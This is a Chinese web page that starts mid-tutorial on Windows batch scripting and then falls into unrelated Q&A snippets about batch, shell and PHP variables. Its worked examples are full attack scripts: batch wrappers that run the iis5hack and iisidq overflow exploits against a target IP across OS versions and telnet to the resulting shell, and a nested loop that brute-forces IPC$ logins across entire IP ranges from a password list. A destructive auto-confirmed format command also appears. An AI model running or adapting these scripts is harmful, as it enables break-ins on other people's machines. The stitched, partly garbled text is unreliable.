程序将没有任何显示也不会产生任何痕迹。 3、 符号(>>) 符号>>的作用与符号>相似，但他们的区别在于>>是传递并在文件末尾追加>>也可将回显传递给控制台（用法同上）例： 文件1.txt内同为： 1+1 使用命令c:>dir *.txt >>1.txt 这时候1.txt的内容如下 1+1 驱动器 C 中的卷没有标签。 卷的序列号是 301A-1508 C: 的目录 2003-03-11 14:04 1,005 FRUNLOG.TXT 2003-04-04 16:38 18,598,494 log.txt 2003-04-04 17:02 5 1.txt 2003-03-12 11:43 0 aierrorlog.txt 2003-03-30 00:35 30,571 202.108.txt 5 个文件 18,630,070 字节 0 个目录 1,191,542,784 可用字节 >>将命令执行的结果覆加在了原始的文件内容后面。 4、 符号(|) |是一个管道传输命令意思是将上一命令执行的结果传递给下一命令去处理。例： C:>dir c:|find "1508" 卷的序列号是 301A-1508 以上命令的意思为查找c:的所有并发现1508字符串。Find的用法请用 find /?自行查看 在不使用format的自动格式化参数的时候我是这样来自动格式化盘片的 echo y|fornat a: /s /q /v:system 用过format命令的人都知道format有一个交互对化过程，要使用者输入y来确定当前的命令是否被执行。在这个命令前加上echo y并用管道传输符|将echo执行的结果y传递给format从而达到手工输入y的目的（这条命令有危害性，测试的时候请谨慎） 5、 符号(^) ^ 是对特殊符号 > 、<、 &、的前导字符。在命令中他将以上的3个符号的特殊动能去掉仅仅只吧他们当成符号而不使用他们的特殊意义。例： c:>echo test ^> 1.txt test > 1.txt 从上面可以看出并没有把test写入文件1.txt而是将test >1.txt 当字符串显示了出来。这个符号在远程构建批处理的时候很有效果。 6、 符号(&) &符号允许在一行中使用2个以上不同的命令，当第一个命令执行失败将不影响第2个命令的执行。例： c:> dir z: &dir y: &dir c: 以上的命令将会连续显示z: y: c:盘内的内容不理会该盘符是否存在。 7、 符号(&&) &&符号也是允许在一行中使用2个以上不同的命令，当第一个命令执行失败后后续的命令将不会再被执行。例： c:> dir z: &&dir y: &&dir c: 以上的命令将会提示检查是否存在z:盘如果存在则执行，如果不存在则停止执行所有的后续命令 8、 符号(" ") " "符号允许在字符串中包含空格。进入一个特殊的目录可以用如下方法例: c:>cd “Program Files” c:>cd progra~1 c:>cd pro* 以上方法都可以进入Program Files目录 9、 符号（,） ,符号相当于空格。在某些特殊的情况下可以用,来代替空格使用。例： c:>dir,c: 10、 符号(;) ;符号当命令相同的时候可以将不同的目标用;隔离开来但执行效果不变。如执行过程中发生错误则只返回错误报告但程序还是会继续执行。例： DIR C:;D:;E:F: 以上的命令相当于 DIR C: DIR D: DIR E: DIR F: 当然还有些特殊的符号但他们的使用范围很小我就不再这里一一的说明了。 第三部分：批处理与变量 在批处理中适当的引用变量将会使你所编制的程序应用面更广。批处理每次能处理的变量从%0~%9共10个。其中%0默认给批处理的文件名使用。除非在使用SHIFT命令后%0才能被%1所替代。引用shift命令的例子如果把%1前面多加上一个%0那么结果如下： C::>SHIFT.BAT 1 2 3 4 5 6 7 8 9 10 11 SHIFT.BAT 1 2 3 4 5 6 7 8 9 1 2 3 4 5 6 7 8 9 10 2 3 4 5 6 7 8 9 10 11 系统是如何区分每个变量的呢，系统区分变量的规则为字符串中间的空格，即只要发现空格就把空格前面的字符当作一个变量而空格后面的字符则作为另一个变量。如果你的变量是一个当中包含空格的长目录名这时候你需要用上一节特殊符号8中所用的引号将他圈起来。例： 批处理内容为： ECHO %1 ECHO %2 ECHO %3 输入命令： C:>TEST “Program Files” Program Files Program Files Program Files 在一个复杂的批处理中又可能同时使用的变量会超过10个这时候会和系统的规则想冲突那么这个问题怎么解决呢？在系统中还有一种变量称之为环境变量（使用SET命令可以查看当前系统的环境变量）如当前系统目录是%windir%或%SystemRoot%等。当同时使用的参数超过10个的时候，我们可以把某些在后面的程序中还要调用的变量保存为环境变量。具体用法如 SET A=%1 这样我们就命名了一个新的环境变量A 在调用变量A的时候要%A%这样调用，环境变量不受SHIFT命令影响。如果要改变一个环境变量需要重新对其设置才能改变。当然也可以进行变量与变量之间的传递来达到目的。下面我们来看一个例子，批处理如下： ECHO OFF SET PASS=%1 SHIFT SET PASS1=%1 SHIFT ECHO %PASS% %PASS1% %1 %2 %3 %4 %5 %6 %7 %8 %9 SHIFT ECHO %PASS% %PASS1% %9 SET PASS=%PASS1% 变量的传递 SET PASS1=%9 SHIFT ECHO %PASS% %PASS1% %9 使用命令：C:>TEST A B 3 4 5 6 7 8 9 10 K L A B 3 4 5 6 7 8 9 10 K 注意：这一行显示了11个变量 A B L 在使用了3次SHIFT之后%9变成了L B L 变量的传递后的结果 第四部分：完整案例 以上就是批处理的一些用法。现在我们把这些用法结合起来详细的分析一下目前网上发布的一些批处理，看看他们是怎么运作的。这里我将列举三个例子来详细分析，为了保持程序的完整我的注释会加在/*后面。 例一 这个例子是利用iis5hack.exe对有.printer漏洞的主机进行溢出的批处理。用到的程序有iis5hack.exe和系统自带的telnet.exe。iis5hack的命令格式为： iis5hack <目标ip> <目标端口> <目标版本> <溢出连接端口>目标版本为0-9这10个数字分别对应不同语言版本和sp的系统版本，我们编制的批处理使用的命令格式为 <iis.bat 目标ip （开始版本号）>开始版本号可有可无。程序如下。 @echo off /*关闭命令回显 if "%1%"=="" goto help /*判断%1是否为空，%1为目标ip if "%2%"=="1" goto 1 /*判断%2是否为1，为1则跳转标志1 if "%2%"=="2" goto 2 /*%2为开始版本号，如果没有设置则 if "%2%"=="3" goto 3 /*如果存在则从匹配的地方开始执行 if "%2%"=="4" goto 4 if "%2%"=="5" goto 5 if "%2%"=="6" goto 6 if "%2%"=="7" goto 7 if "%2%"=="8" goto 8 if not EXIST iis5hack.exe goto file /*没有发现iis5hack.exe就执行标志file段内容 ping %1 -n 1 | find "Received = 1" /*ping目标1次，从结果中发现Received = 1 if errorlevel 1 goto error /*如果返回代码为1则执行error段(代码1为没有发现 0为发现并成功执行) iis5hack %1 80 9 88 | find "good" /*开始溢出目标端口80 系统代码9 溢出后连接端口88 在执行结果中发现字符串”good”(溢出成功后才会有字符串good) if not errorlevel 1 goto telnet /*如果没有错误代码1（溢出成功）就执行telnet段的内容。 echo 操作系统类型 9 失败! /否则显示这一句 :8 /*以下代码内容参照上面 iis5hack %1 80 8 88 | find "good" if not errorlevel 1 goto telnet echo 操作系统类型 8 失败! :7 iis5hack %1 80 7 88 | find "good" if not errorlevel 1 goto telnet echo 操作系统类型 7 失败! :6 iis5hack %1 80 6 88 | find "good" if not errorlevel 1 goto telnet echo 操作系统类型 6 失败! :5 iis5hack %1 80 5 88 | find "good" if not errorlevel 1 goto telnet echo 操作系统类型 5 失败! :4 iis5hack %1 80 4 88 | find "good" if not errorlevel 1 goto telnet echo 操作系统类型 4 失败! :3 iis5hack %1 80 3 88 | find "good" if not errorlevel 1 goto telnet echo 操作系统类型 3 失败! :2 iis5hack %1 80 2 88 | find "good" if not errorlevel 1 goto telnet echo 操作系统类型 2 失败! :1 iis5hack %1 80 1 88 | find "good" if not errorlevel 1 goto telnet echo 操作系统类型 1 失败! :0 iis5hack %1 80 0 88 | find "good" if not errorlevel 1 goto telnet echo 操作系统类型 0 失败! goto error :telnet telnet %1 88 /*开始连接目标ip的88端口 goto exit /*连接中断后跳转exit段 :error /*error段显示错误后的帮助信息 echo 可能网络不能连接或者对方以修补该漏洞!请按照下面的格式手工尝试一次! echo iis5hack [目标IP] [WEB端口] [系统类型] [开放端口] ECHO 中文: 0 ECHO 中文+sp1: 1 ECHO 英文: 2 ECHO 英文+sp1: 3 ECHO 日语: 4 ECHO 日语+sp1: 5 ECHO 韩文: 6 ECHO 韩文+sp1: 7 ECHO 墨西哥语: 8 ECHO 墨西哥语+sp1: 9 goto exit /*跳转exit段 :file /*file段显示文件没有发现的信息 echo 文件iis5hack.exe没有发现!程序终止运行! goto exit /*跳转exit段 :help /*help段显示本批处理的使用格式帮助 echo 本程序用法如下: echo iis [目标ip] echo iis [目标ip] [开始的号码9-0] :exit /*exit段为程序出口 这个批处理基本没有什么循环只是一路走下来。所以代码比较长难度不大！ 例二 这个例子是用iisidq.exe对有idq漏洞的机器进行溢出的批处理。使用的程序有iisidq.exe和系统自带的程序telnet.exe。iisidq.exe的用法如下： 运行参数: 操作系统类型 目的地址 web端口 1 溢出监听端口 <输入命令1> 其中,如果输入命令参数没有输入,那么,默认为:"cmd.exe"。 其中操作系统类型类型的代码范围是0-14。我们编制的批处理使用的命令格式为 <idq.bat 目标ip>程序如下： @echo off /*同例一 if not EXIST iisidq.exe goto file /*同例一 if %1 == "" goto error /*同例一 ping %1 -n 1 | find "Received = 1" /*同例一 if errorlevel 1 goto error1 /*同例一 set b=%1 /*创建一个环境变量b,将变量%1的内容传递给环境变量b。变量b的内容以后将是目标ip set a=0 /*创建一个环境变量a并指定环境变量a为0。由于使用整个批处理的循环所以用a来做计数器。 :no /*no段开始 if %a%==0 set d=0 /*如果环境变量a=0则创建环境变量d设定环境变量d=0。 if %a%==1 set d=1 /*环境变量d其实是操作系统类型代码，用计数器来控制其 if %a%==2 set d=2 /*变动。 if %a%==3 set d=3 if %a%==4 set d=4 if %a%==5 set d=5 if %a%==6 set d=6 if %a%==7 set d=7 if %a%==9 set d=9 if %a%==10 set d=13 if %a%==11 set d=14 goto 0 /*变量传递完成后转到标志0处运行 :1 echo 正在执行第%d%项!与目标%b%不能连接!正在尝试连接请等候...... :0 /*标志0开始 IISIDQ %d% %b% 80 1 99 |find "good" /*按格式发送溢出命令并在结果中发现字符串good（发送代码成功才会有字符串good） if errorlevel 1 goto 1 /*如果没有good字符串则没有发送成跳 /*转标志1处继续尝试发送 ping 127.0.0.1 -n 8 >nul /*ping自己8次相当于延时8秒不显示执 /*行结果 echo 正在执行第%d%项! /*报告正在溢出的操作系统类型 telnet %b% 99 /*连接溢出端口 echo. /*显示一个空行 if %d%==14 goto error1 /*如果操作系统类型为14则跳转error1处（循环出口） if %d%==13 set a=11 /*开始用计数器对操作系统代码重新附值 if %d%==9 set a=10 if %d%==7 set a=9 if %d%==6 set a=7 if %d%==5 set a=6 if %d%==4 set a=5 if %d%==3 set a=4 if %d%==2 set a=3 if %d%==1 set a=2 if %d%==0 set a=1 goto no /*附值完成跳转no段执行 :file /*以下都是出错后的帮助提示 echo IIsidq.exe没有发现!将该文件和本文件放在同一目录! goto exit :error echo 错误!目标ip不可识别!请使用下面的格式连接! echo idq [目标IP] goto exit :error1 echo 连接没有成功!可能目标机器已经修补了该漏洞或者网络故障所至! echo 请按照下面的格式手工尝试! echo iisidq [目标类型] [目标IP] [目标端口] [连接方式] [溢出端口] echo telnet [目标ip] [溢出端口] :exit /*整个程序的出口 这个批处理采用的整体循环掌握好计数器部分就掌握了这个批处理。 例三 for /l %%a in (0,1,255) do for /l %%b in (0,1,255) do for /l %%c in (1,1,254) do for /f "tokens=1,2*" %%e in (userpass.txt) do net use \%1.%%a.%%b.%%cipc$ %%e /u:%%f 上面的命令为1条命令。大家可以看出该命令使用了4个FOR来套用的。用法为：C:>TEST.BAT 218 当输入218回车后该命令会由第1个for取初

for %%a in ("%cd%") do set DirName=%%~nxafor /f "tokens=3-5 delims=-_" %%a in ("%DirName%") do ( set cc=%%~a set dd=%%~b set ee=%%~c)echo %cc%echo %dd%echo %ee%

在vb中用if判断一个String变量Str是否为空，可以用二种方法：If Str<>"" Then Print "Str 不是一个空串"或：If Len(Str)>0 Then Print "Str 不是一个空串"

批处理，也称为批处理脚本，英文译为BATCH，批处理文件后缀BAT就取的前三个字母。它的构成没有固定格式，只要遵守以下这条就ok了：每一行可视为一个命令，每个命令里可以含多条子命令，从第一行开始执行，直到最后一行结束，它运行的平台是DOS。批处理有一个很鲜明的特点：使用方便、灵活，功能强大，自动化程度高。我不想让自己写的教程枯燥无味，因为牵缠到代码（批处理的内容算是代码吧？）的问题本来就是枯燥的，很少有人能面对满屏幕的代码而静下心来。所以我会用很多简单实用的例子让读这篇教程的朋友去体会批处理的那四射的魅力，感受它那古灵精怪的性格，不知不觉中爱上批处理（晕，怎么又是爱？到底批处理和爱有什么关系？答案：没有！）。再说句“闲话”：要学好批处理，DOS基础一定要牢！当然脑子灵活也是很重要的一方面。

Shell是一个用C语言编写的程序,它是用户使用Linux的桥梁。Shell既是一种命令语言,又是一种程序设计语言,涵盖的知识点多且杂，却是云计算开发人员必须要掌握的技术之一。接下来就给大家梳理一下Shell变量相关的知识。Linux Shell中的变量可以被指定为任意的数据类型，比如文本字符串或者数值。你也可以通过修改Shell中的变量来改变Shell的样式。Shell支持三种定义变量的方式：variable=valuevariable="value"variable="value"variable是变量名，value是赋给变量的值。如果value不包含任何空白符（例如空格、Tab缩进等），那么可以不使用引号；如果value包含了空白符，那么就必须使用引号包围起来。注意，赋值号=的周围不能有空格。Shell变量的命名规范和大部分编程语言一样：变量名由数字、字母、下划线组成；必须以字母或者下划线开头；不能使用Shell里的关键字（通过help命令可以查看保留关键字）。Linux中Shell变量分为系统变量和用户自定义变量，系统变量包括$HOME、$PWD、$SHELL、$USER、echo $SHELL以及显示当前Shell中所有变量set。Shell自定义变量包括1）定义变量：变量=值；2）撤销变量：unset变量；3）声明静态变量：readonly变量，注意不能unset；4）使用export把变量提升为全局环境变量，如/etc/profile中的TOMCAT_HOME变量，且在另外的/opt/tmp/shell/myShell.sh脚本中使用该环境变量。Shell设置环境变量基本语法：1）export：变量名=变量值（功能描述：将shell变量输出为环境变量）2）source：配置文件（功能描述：让修改后的配置文件立即生效）3）echo：$变量名（功能描述：查询环境变量的值）单行注释：#多行注释：:<<!需要注释的内容!Shell脚本很适合处理纯文本类型的数据，而Linux中几乎所有的配置文件、日志文件（如NFS、Rsync、Httpd、Nginx、MySQL等），以及绝大多数的启动文件都是纯文本类型的文件。Shell是运维人员必须要掌握的技能，此外还需要掌握Linux、信息安全、Docker容器等。

12345678910111213141516@echo off&setlocal enabledelayedexpansionset n=0for /f "delims=" %%a in ("dir /b "F:11"") do (if /i not "%%a"=="22.txt" (set /a n+=1set "wj!n!=%%a"))for /f "tokens=1* delims==" %%a in ("set wj") do (echo %%b %%a)echo 共有%n%个文件(夹)set /p "a=请输入变量名:"set "a=!%a%!"echo 变量对应的文件(夹)是:%a%pause

@echo off&for /f %%i in ("help^|findstr "^[A-Z]"") do (cmd /c %%i /?&pause)

Linux中经常看到有人用echo，首先这是一个命令。echo，有显示、印出的意思，后面跟着参数。直接跟着string则在界面上打印出string$sth$表示后面接的是变量。会在界面上显示出sth变量的值有需要了解更多Linux命令的话推荐一个不错的网站，看下图：

也可以，因为加双引号可以把其意思改变。但不怎么好。

显示系统设置好的环境变量值。

这个跟echo命令有关系echo会换行解释为空格

1.if exist file1 if exist file2 command，if的嵌套2.只会exit3.echo %cd% 即知，用类似“echo %环境变量名%”的形式，可以知道所有变量的含义。4.不知道什么文件 if exist嵌套要不要括号？这得看情况，如果嵌套的if语句后有多条语句就要括号，如果只有一条则可省略。 设置变量：set hello=123rem 给变量hello赋值123echo %hello%rem 显示变量hellopauseset /p hell0=输入变量的值：rem 运行批处理手动输入变量值echo %hello%pause具体的，保存为bat，测试一下结果你就知道怎么设置变量了。

sed "s/var1/var2/" original.file > another.filesed "s/var1/var2/" original.file > another.file

echo就可以输出变量值了如果有$a,$b两个变量就输出echo$a."".$b;如果要循环输出变量比如for($i=0;$i<1000;$i++){echo"$i."";}这样就能输出从0到999的数字

.号会原样输出，只是作为分隔符用的比如a=hello, 那这个命令输出就是：$a=.hello.

变量没有定义，如下才是正确的。set /a x=1set /a y=0;:loopset /a y=%x%+%y%echo %y%set /a x=%x%+1if %x% lss 10 goto looppause

linux环境变量，设置的时候不带$前缀，引用的时候才使用$，如：[root@myserver soft]# LINES=24[root@myserver soft]# echo $LINES24[root@myserver soft]# LINES=25[root@myserver soft]# echo $LINES25[root@myserver soft]#

查看属性命令attrib看一下他的属性，用tpye命令查看他的内容，如果显示为空白，那么他的内容就为空，举个例子：假设我的D盘下有一个1.txt的文件，里面内容为abc,那么执行以下命令，attrib d:1.txttype d:1.txt就可以知道了。

echo 后面是你要输出的内容。普通字符串需要双引号扩起来。变量不需要echo "这里是字符串，需要引号";echo $bianliang; //这里是变量，不需要（//两个斜杠，是注释的意思，页面不会输出）php里的br，书写格式：echo "<br>";html里的br，书写格式：<br>区别就是单独书写的时候，php代码多，html代码少。功能没有区别，都是换行

echo在php相当重要的,虽然看上去它简单语法也简单,但是echo函数在程序中会常常被用到,它的作用是用于输,变量,字符串,常量,html等;正如你看到在过去的教训，PHP的命令echo是一种手段，输出文字的网页浏览器。在整个职业生涯，你的PHP你将使用echo命令超过了其他任何。让我们给它一个坚实的阅读！输出字符:输出一个字符串，就像我们在以前的教训，使用PHPecho。您可以将任何一个字符串变量或者您可以使用引号，就像我们下面，创建一个字符串，echo功能将输出。<?php$myString="Hello!";echo$myString;echo"<h5>www.45it.com!</h5>";?>输出来www.45it.com!在上面的例子中，我们输出“你好！”顺利。文字输出，我们正在发送给用户的形式，一个网页，所以重要的是，我们使用适当的HTML语法！在我们的第二个echo发言中，我们使用echo写一个有效的头五的HTML发言。为此，我们只是把<h5>开始的时候，字符串和关闭它在字符串结尾。只是因为你使用PHP，使网页并不意味着你可以忘记的HTML语法！CarefulWhenEchoingQuotes!这是很酷，您可以输出的HTML用PHP。但是，你必须谨慎使用HTML代码或任何其他字符串，其中包括引号！echo使用引号来定义的开头和结尾的字符串，所以你必须使用下列其中一个策略如果您的字符串包含报价：不要使用引号内的字串逃避你的报价是字符串内用反斜杠。为了逃避报价公正的地方直接反斜杠前引号，即“使用单引号（撇号）的引号内的字符串。见我们的例子下面的正确和错误的使用echo：<?php//Thiswon"tworkbecauseofthequotesaroundspecialH5!echo"<h5class="specialH5">IloveusingPHP!</h5>"; //OKbecauseweescapedthequotes!echo"<h5class="specialH5">IloveusingPHP!</h5>"; //OKbecauseweusedanapostrophe"echo"<h5class="specialH5">IloveusingPHP!</h5>"; ?>来看看echo输出变量.<?php$my_string="HelloBob. Mynameis:";$my_number=4;$my_letter=a;echo$my_string;echo$my_number;echo$my_letter;?>输出结果:4a字符串与变量同时输出.您还可以进行内部的变量双引号的字符串（例如，“在这里和字符串美元的变量”）。把一个变量内的引号（“”）告诉你是PHP的，你要抓住的字符串值是变量和使用它的字符串。下面的例子表明这方面的一个例子降温功能。<?php$my_string="HelloBob. Mynameis:";echo"$my_stringBobettta<br/>";echo"Hi,I"mBob. Whoareyou?$my_string<br/>";echo"Hi,I"mBob. Whoareyou?$my_stringBobetta";?>

当前shell的进程号。你可以使用ps -A 看你自己shell 的pid。是内置变量。$#传递到脚本的参数个数$*以一个单字符串显示所有向脚本传递的参数，与位置变量不同，此选项参数可超过9个$$脚本运行的当前进程ID号$!后台运行的最后一个进程的进程ID号$@与$#相同，但是使用时加引号，并在引号中返回每个参数$-显示shell使用的当前选项，与set命令功能相同$?显示最后命令的退出状态。0表示没有错误，其它任何值表明有错误

echo $(ls -l)|while read linedoecho $linedone不知道是否合你意。

写一个a.sh脚本：$cata.sh#!/bin/bashdeclare-ikdeclare-imdeclare-aarrk=0m=0rm-frnum.txttouchnum.txt{sleep10;echo"10.0">>num.txt;}&{sleep10;echo"20.0">>num.txt;}&waitwhilereadlinedoarr[$k]=$line((k++));done<num.txtwhile[$m-lt$k]doecho${arr[$m]}((m++))done运行它：$chmod+xa.sh$a.sh(或者./a.sh)10.020.0谢谢。因为不了解你的详细情况和需求。仅供参考。

加引号 a=“-e" echo $a

把第二行加个大括弧，是变量解释问题echo "{$a}等于5 ";

在linux，shell中，echo$SHELL变量代表的是shell程序。根据查询相关资料信息，在Linux中，$符号代表一个shell变量。所有的shell都用这种方式使用变量。有一些shell变量在你的系统启动的时候就有了默认值，echo命令的作用就是打印出输入echo$SHELL变量。

你的标题可能不切实，$M++ 不是一个变量，而是一个表达式。

cat 查看文本文件 echo 输出字符串

@echo offsetlocal enabledelayedexpansionset "datenum=0"set "ipath="for /f "tokens=*" %%i in (.logDate.txt) do ( set /a datenum+=1 if !datenum! equ 2 ( set "ipath=%%i" rem 给变量赋值的时候最好用引号把变量括起来,因为bat对空格异常敏感 echo.%%i echo.!ipath! ))pause

我写了一个批处理文件，想实现ping多个ip（保存在文本文件中）并返回ping失败的ip。不知道什么原因，for循环失效，只能取到文件中第一行的ip并得到ping的结果。请高手指教！！！存放ip的文本文件格式如下：92.16.1.1-计算机192.16.3.46-计算机292.23.4.126-计算机3...批处理代码如下：@echo offecho.正在检查请等待...echo %date%>>检测结果^(PING失败^).txtecho.Setlocal ENABLEDELAYEDEXPANSION::启用命令扩展，参加setlocal /?命令for /f %%i in (IP表.txt) do (set str1=%%iset ch1=-set num=8set str=!str1:~8!::截取字符串str1除前8位的部分赋值给str，因为我单位IP地址最短位数是8位（92.X.X.X）:nextif not "!str!"=="" (if "!str:~0,1!"=="!ch1!" goto last::比较首字符是否为要找的字符，如果是则跳出循环set /a num+=1set str=!str:~1!goto next)set /a num=0::没有找到字符时，将num置0:lastset ip=!str1:~0,%num%!echo %ip% ping -n 1 %ip% >nul && echo %ip% ping入成功 || echo %ip% ping入失败 && echo %str1%>>检测结果^(PING失败^).txt)echo.echo.检查完成,按任意键退出并查看"检测结果(PING失败).txt"pause>nulstart 检测结果^(PING失败^).txt

是windows上么，建议用winpython，这个不用安装，复制文件夹就可以运行，U盘里都可以运行。

用export命令

你赋值过 date 么？如果我没记错，系统里面默认是没有叫 data 的环境变量的。直接执行 export ，会输出全部的环境变量（貌似除了特殊变量）。